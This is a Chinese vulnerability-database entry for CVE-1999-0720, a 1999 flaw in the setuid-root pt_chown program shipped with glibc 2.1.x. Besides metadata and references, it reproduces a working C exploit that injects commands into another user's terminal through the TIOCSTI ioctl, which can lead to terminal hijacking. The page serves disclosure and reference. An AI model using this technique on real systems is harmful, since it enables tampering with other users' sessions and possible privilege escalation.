Linux pt_chown漏洞

Linux pt_chown漏洞

漏洞ID 1105525 漏洞类型 其他
发布时间 1999-08-23 更新时间 2005-05-02
图片[1]-Linux pt_chown漏洞-安全小百科CVE编号 CVE-1999-0720
图片[2]-Linux pt_chown漏洞-安全小百科CNNVD-ID CNNVD-199908-047
漏洞平台 Linux CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/19467
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199908-047
|漏洞详情
基于Linux平台的pt_chown命令存在漏洞。本地用户可以修改其他用户的TTY终端设备。
|漏洞EXP
// source: http://www.securityfocus.com/bid/597/info

// pt_chown is a program included with glibc 2.1.x that exists to aid the proper allocation of terminals for non-suid programs that don't have devpts support. It is installed setuid root, and is shipped with RedHat Linux 6.0. As it stands, pt_chown is vulnerable to an attack that allows malicious users to write aribtrary data to tty input/output streams (open file desciptors -> tty) that don't belong to them (you could theoretically get full control of the terminal). This is done by fooling the program into giving you access (it lacks security checks). Whether you can be compromised or not depends on the software you are using and whether it has support for devpts (screen, midnight commander, etc). The consequences are hijacking of terminals, possibly leading to a root compromise.

int main(int a,char* b[]) {

char* c="nclear;echo huhuhu, it worked...;id;sleep 2n";
int i=0,x=open(b[1],1); // Expect writable, allocated
// (eg. by screen) /dev/ttyXX as 1st arg

if (x<0) {
perror(b[1]);
exit(1);
}

if (!fork()) {
dup2(x,3);
execl("/usr/libexec/pt_chown","pt_chown",0);
perror("pt_chown");
exit(1);

}
sleep(1);
for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]);

}
|参考资料

来源:BUGTRAQ
名称:19990823[Linux]glibc2.1.x/wu-ftpd<=2.5/BeroFTPD/lynx/vlock/mc/glibc2.0.x
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:597
链接:http://www.securityfocus.com/bid/597

相关推荐: Solaris arp漏洞

Solaris arp漏洞 漏洞ID 1105233 漏洞类型 其他 发布时间 1994-02-01 更新时间 2005-05-02 CVE编号 CVE-1999-0859 CNNVD-ID CNNVD-199912-015 漏洞平台 Solaris CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享